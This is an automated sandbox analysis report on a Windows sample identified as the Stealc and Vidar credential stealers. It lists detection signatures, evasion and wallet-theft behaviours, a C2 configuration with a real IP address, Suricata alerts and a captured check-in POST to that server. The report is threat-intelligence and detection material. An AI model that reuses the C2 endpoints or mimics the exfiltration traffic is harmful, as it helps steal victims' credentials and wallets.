Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:	file.exe
Analysis ID:	1541395
MD5:	fe2148029209699e0ee2cba27c4d5f8b
SHA1:	4c9a256eedfa50b45b488e01c656bd72ddec016d
SHA256:	2202c6a6673d6a90682946b94edfc8c6bac495997e064c62b36bc0f046457a51
Tags:	exeuser-Bitsight
Infos:

Detection

Stealc, Vidar

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Detected unpacking (changes PE section rights)

Found malware configuration

Suricata IDS alerts for network traffic

Yara detected Powershell download and execute

Yara detected Stealc

Yara detected Vidar stealer

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Found evasive API chain (may stop execution after checking locale)

Found many strings related to Crypto-Wallets (likely being stolen)

Hides threads from debuggers

Machine Learning detection for sample

PE file contains section with special chars

Searches for specific processes (likely to inject)

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Tries to detect sandboxes and other dynamic analysis tools (window names)

Tries to detect virtualization through RDTSC time measurements

Tries to evade debugger and weak emulator (self modifying code)

Tries to harvest and steal Bitcoin Wallet information

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

Tries to steal Mail credentials (via file / registry access)

Checks for debuggers (devices)

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Contains functionality to create guard pages, often used to hinder reverse engineering and debugging

Contains functionality to dynamically determine API calls

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Detected potential crypto function

Downloads executable code via HTTP

Drops PE files

Drops PE files to the application program directory (C:\ProgramData)

Entry point lies outside standard sections

Extensive use of GetProcAddress (often used to hide API calls)

Found dropped PE file which has not been started or loaded

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

PE file contains an invalid checksum

PE file contains sections with non-standard names

Queries information about the installed CPU (vendor, model number etc)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

file.exe (PID: 7284 cmdline: "C:\Users\user\Desktop\file.exe" MD5: FE2148029209699E0EE2CBA27C4D5F8B)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Stealc	Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-1/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-2/ https://cocomelonc.github.io/book/2023/12/13/malwild-book.html https://g0njxa.medium.com/approaching-stealers-devs-a-brief-interview-with-stealc-cbe5c94b84af	https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Name	Description	Attribution	Blogpost URLs	Link
Vidar	Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.	No Attribution	https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-1-(-Unpacking-)/ https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-2/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/vidar-stealer-h-and-m-campaign https://0xtoxin.github.io/malware%20analysis/Vidar-Stealer-Campaign/ https://asec.ahnlab.com/en/22932/	https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Malware Configuration

Threatname: StealC

{"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}

Threatname: Vidar

{"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_Stealc_1	Yara detected Stealc	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000000.00000002.1951143669.000000000112E000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000000.00000002.1951143669.00000000011A5000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000003.1723190481.0000000004CD0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000000.00000002.1950016407.0000000000361000.00000040.00000001.01000000.00000003.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
Process Memory Space: file.exe PID: 7284	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Process Memory Space: file.exe PID: 7284	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: file.exe PID: 7284	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: file.exe PID: 7284	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
Click to see the 3 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.file.exe.360000.0.unpack	JoeSecurity_Stealc	Yara detected Stealc	Joe Security

Suricata Signatures

ET MALWARE Win32/Stealc Active C2 Responding with browsers Config

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-24T19:29:05.443627+0200	2044245	1	Malware Command and Control Activity Detected	185.215.113.37	80	192.168.2.4	49730	TCP

ET MALWARE Win32/Stealc Requesting browsers Config from C2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-24T19:29:05.436607+0200	2044244	1	Malware Command and Control Activity Detected	192.168.2.4	49730	185.215.113.37	80	TCP

ET MALWARE Win32/Stealc Requesting plugins Config from C2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-24T19:29:05.724623+0200	2044246	1	Malware Command and Control Activity Detected	192.168.2.4	49730	185.215.113.37	80	TCP

ET MALWARE Win32/Stealc Submitting System Information to C2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-24T19:29:06.840247+0200	2044248	1	Malware Command and Control Activity Detected	192.168.2.4	49730	185.215.113.37	80	TCP

ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-24T19:29:05.733776+0200	2044247	1	Malware Command and Control Activity Detected	185.215.113.37	80	192.168.2.4	49730	TCP

ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-24T19:29:05.148928+0200	2044243	1	Malware Command and Control Activity Detected	192.168.2.4	49730	185.215.113.37	80	TCP

ETPRO MALWARE Common Downloader Header Pattern HCa

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-24T19:29:07.714647+0200	2803304	3	Unknown Traffic	192.168.2.4	49730	185.215.113.37	80	TCP
2024-10-24T19:29:14.884091+0200	2803304	3	Unknown Traffic	192.168.2.4	49730	185.215.113.37	80	TCP
2024-10-24T19:29:16.257109+0200	2803304	3	Unknown Traffic	192.168.2.4	49730	185.215.113.37	80	TCP
2024-10-24T19:29:17.178133+0200	2803304	3	Unknown Traffic	192.168.2.4	49730	185.215.113.37	80	TCP
2024-10-24T19:29:18.016493+0200	2803304	3	Unknown Traffic	192.168.2.4	49730	185.215.113.37	80	TCP
2024-10-24T19:29:19.938641+0200	2803304	3	Unknown Traffic	192.168.2.4	49730	185.215.113.37	80	TCP
2024-10-24T19:29:20.605637+0200	2803304	3	Unknown Traffic	192.168.2.4	49730	185.215.113.37	80	TCP

HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FCFBFHIEBKJKFHIEBFBAHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 43 46 42 46 48 49 45 42 4b 4a 4b 46 48 49 45 42 46 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 31 43 37 38 31 37 38 38 32 44 37 32 32 38 34 35 38 32 31 32 37 0d 0a 2d 2d 2d 2d 2d 2d 46 43 46 42 46 48 49 45 42 4b 4a 4b 46 48 49 45 42 46 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 46 43 46 42 46 48 49 45 42 4b 4a 4b 46 48 49 45 42 46 42 41 2d 2d 0d 0a Data Ascii: ------FCFBFHIEBKJKFHIEBFBAContent-Disposition: form-data; name="hwid"41C7817882D72284582127------FCFBFHIEBKJKFHIEBFBAContent-Disposition: form-data; name="build"doma------FCFBFHIEBKJKFHIEBFBA--

Source: file.exe, file.exe, 00000000.00000002.1951143669.000000000112E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1950016407.0000000000361000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://185.215.113.37
Source: file.exe, 00000000.00000002.1951143669.0000000001187000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/
Source: file.exe, 00000000.00000002.1951143669.00000000011A5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/freebl3.dll
Source: file.exe, 00000000.00000002.1951143669.00000000011A5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/freebl3.dll8
Source: file.exe, 00000000.00000002.1951143669.00000000011A5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/mozglue.dll
Source: file.exe, 00000000.00000002.1951143669.00000000011A5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/mozglue.dllX
Source: file.exe, 00000000.00000002.1951143669.00000000011A5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/msvcp140.dll
Source: file.exe, 00000000.00000002.1951143669.0000000001187000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1951143669.0000000001172000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/nss3.dll
Source: file.exe, 00000000.00000002.1951143669.0000000001172000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/nss3.dllI
Source: file.exe, 00000000.00000002.1951143669.00000000011A5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/softokn3.dll
Source: file.exe, 00000000.00000002.1951143669.00000000011A5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/softokn3.dllr
Source: file.exe, 00000000.00000002.1951143669.00000000011A5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/sqlite3.dllJ
Source: file.exe, 00000000.00000002.1951143669.000000000112E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/sqlite3.dllY$~
Source: file.exe, 00000000.00000002.1951143669.000000000112E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/sqlite3.dllk$l
Source: file.exe, 00000000.00000002.1951143669.00000000011A5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/sqlite3.dlln
Source: file.exe, 00000000.00000002.1951143669.0000000001187000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/vcruntime140.dll
Source: file.exe, 00000000.00000002.1951143669.0000000001187000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/vcruntime140.dllf
Source: file.exe, 00000000.00000002.1951143669.0000000001178000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1835678822.00000000011FB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1950016407.0000000000361000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php
Source: file.exe, 00000000.00000002.1951143669.00000000011A5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php3
Source: file.exe, 00000000.00000002.1951143669.0000000001178000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php4
Source: file.exe, 00000000.00000002.1951143669.00000000011A5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpCoinomi
Source: file.exe, 00000000.00000003.1835678822.00000000011FB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpE
Source: file.exe, 00000000.00000002.1951143669.0000000001187000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpIJKKKKKFCAAAAFBKF
Source: file.exe, 00000000.00000002.1951143669.0000000001187000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpIJKKKKKFCAAAAFBKFy
Source: file.exe, 00000000.00000002.1951143669.0000000001178000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpd
Source: file.exe, 00000000.00000002.1951143669.00000000011A5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpf
Source: file.exe, 00000000.00000002.1951143669.00000000011A5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpl
Source: file.exe, 00000000.00000002.1951143669.00000000011A5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpser
Source: file.exe, 00000000.00000002.1950016407.0000000000361000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phption:
Source: file.exe, 00000000.00000002.1951143669.0000000001187000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/s
Source: file.exe, 00000000.00000002.1950016407.0000000000361000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://185.215.113.37ECFHDB--
Source: file.exe, 00000000.00000002.1951143669.000000000112E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37O
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl07
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0A
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0N
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0X
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: file.exe, 00000000.00000002.1971760211.000000006F8ED000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr	String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: file.exe, 00000000.00000002.1963134690.000000001D43D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1971368828.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: HCFIJKKK.0.dr	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: file.exe, 00000000.00000002.1951143669.0000000001204000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1968279719.0000000029371000.00000004.00000020.00020000.00000000.sdmp, HCFIJKKKKKFCAAAAFBKF.0.dr	String found in binary or memory: https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.
Source: file.exe, 00000000.00000002.1951143669.0000000001204000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1968279719.0000000029371000.00000004.00000020.00020000.00000000.sdmp, HCFIJKKKKKFCAAAAFBKF.0.dr	String found in binary or memory: https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta
Source: HCFIJKKK.0.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: HCFIJKKK.0.dr	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: HCFIJKKK.0.dr	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: file.exe, 00000000.00000002.1951143669.0000000001204000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1968279719.0000000029371000.00000004.00000020.00020000.00000000.sdmp, HCFIJKKKKKFCAAAAFBKF.0.dr	String found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
Source: file.exe, 00000000.00000002.1951143669.0000000001204000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1968279719.0000000029371000.00000004.00000020.00020000.00000000.sdmp, HCFIJKKKKKFCAAAAFBKF.0.dr	String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: HCFIJKKK.0.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: HCFIJKKK.0.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: HCFIJKKK.0.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: HCFIJKKKKKFCAAAAFBKF.0.dr	String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: https://mozilla.org0/
Source: HCFIJKKKKKFCAAAAFBKFIECAAK.0.dr	String found in binary or memory: https://support.mozilla.org
Source: HCFIJKKKKKFCAAAAFBKFIECAAK.0.dr	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: HCFIJKKKKKFCAAAAFBKFIECAAK.0.dr	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF
Source: file.exe, file.exe, 00000000.00000003.1814304852.000000001D33C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1950016407.00000000003BA000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000002.1950016407.0000000000361000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: file.exe, 00000000.00000002.1950016407.00000000003BA000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000002.1950016407.0000000000361000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK201621kbG1nY
Source: file.exe, 00000000.00000002.1950016407.0000000000361000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Ed1aWxkV
Source: file.exe, 00000000.00000003.1814304852.000000001D33C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1950016407.00000000003BA000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: file.exe, 00000000.00000002.1950016407.00000000003BA000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17WdsYWhtbmRlZHwxfDB8MHxab2hvIF
Source: file.exe, 00000000.00000002.1950016407.00000000003BA000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17mluIFdhbGxldHxmbmpobWtoaG1rYm
Source: file.exe, 00000000.00000002.1950016407.00000000003BA000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17t
Source: file.exe, 00000000.00000002.1951143669.0000000001204000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1968279719.0000000029371000.00000004.00000020.00020000.00000000.sdmp, HCFIJKKKKKFCAAAAFBKF.0.dr	String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: https://www.digicert.com/CPS0
Source: HCFIJKKK.0.dr	String found in binary or memory: https://www.ecosia.org/newtab/
Source: file.exe, 00000000.00000002.1951143669.0000000001204000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1968279719.0000000029371000.00000004.00000020.00020000.00000000.sdmp, HCFIJKKKKKFCAAAAFBKF.0.dr	String found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
Source: HCFIJKKK.0.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: HCFIJKKKKKFCAAAAFBKFIECAAK.0.dr	String found in binary or memory: https://www.mozilla.org
Source: file.exe, 00000000.00000002.1950016407.00000000003BA000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/about/
Source: HCFIJKKKKKFCAAAAFBKFIECAAK.0.dr	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
Source: file.exe, 00000000.00000002.1950016407.00000000003BA000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/
Source: HCFIJKKKKKFCAAAAFBKFIECAAK.0.dr	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
Source: file.exe, 00000000.00000002.1950016407.00000000003BA000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
